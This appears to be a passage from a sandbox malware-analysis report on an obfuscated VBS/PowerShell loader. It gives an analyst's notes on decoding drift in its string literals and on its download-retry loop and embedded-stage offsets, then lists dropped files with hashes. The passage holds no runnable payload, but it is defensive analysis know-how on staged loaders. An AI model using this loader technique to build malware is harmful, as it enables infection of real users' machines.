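Two caveats when running this against the report text rather than the original .vbs. First, the user-agent literal decodes cleanly as far as `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101` and then desynchronises, and the longer literals (the download URL in $Funktionserklringen, the `echo %appdata%\Absterge.Pig` command in $Korrektiv) show the same drift; the rendered page appears to have dropped non-ASCII characters (variable names such as `Undersgtes` and `Forfodssnkningers` read like Danish words with ø and æ missing), and a single dropped filler character shifts every later index. Second, the cleartext parts of the script are still informative: the loader loops in `while (!$Cabbie)` over the URLs in `$Dividingly[$Strivy]` until the dropped file exists, and the only unobfuscated constants, `$Dustpan=301913` and `$Eyl=29401`, are presumably the offset and length of the embedded stage it carves out of that file.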
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 2299a6fb34550e1d3e6dd69f6fb5cbfb
SHA1 082eb4da1816d3a20d7bead043b7367b9dfcdf24
SHA256 2d550eb29bb22df74cc499d69f71653a96b26d091276472a24023f4f2d42eb01
SHA512 12cedad6552f192b93e81b4cb0e53b9db554be8bb3f4c209a25be50e91160a5b532bc72c6965dc49afa4ac756ae00562612a7626f30becd2c06573118666c8c0
-
Filesize 68KB
MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize 177KB
MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize 431KB
MD5 ce1f757dad7e08f32964a255a380674e
SHA1 19e38ec002272355856d0f68324c0b18a7a07dc0
SHA256 4e0fe5353ac7e82175ab48a53995198157b546bb2eec91ee1d7d63432b710548
SHA512 ad6b88260234a1abf893680f0332510cd08f9192b6e76478c962203617e689b9cf538f7b2aa44422493d4a80b872a24bcf4258e17a540eaf901a59f37933707e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JQ18KB3ITWJJSPMTJK0U.temp
Filesize 7KB
MD5 31e946d92f43dac050f1142afdb612f2
SHA1 bc97c240fd9a57fac638e4992e1b097b1834f20f
SHA256 bad1c8e64108f46e9000247fc338f5e01310338d6107bbd4bc1cd9a80dcb0e74
SHA512 4552b752c8d562ab7dcfd13818508053fded8e87fa7046b0bb1ac3455ab78e38c5587751a27353829aa137a8acfdb09df13dae9a7e689f75c8df29052e095399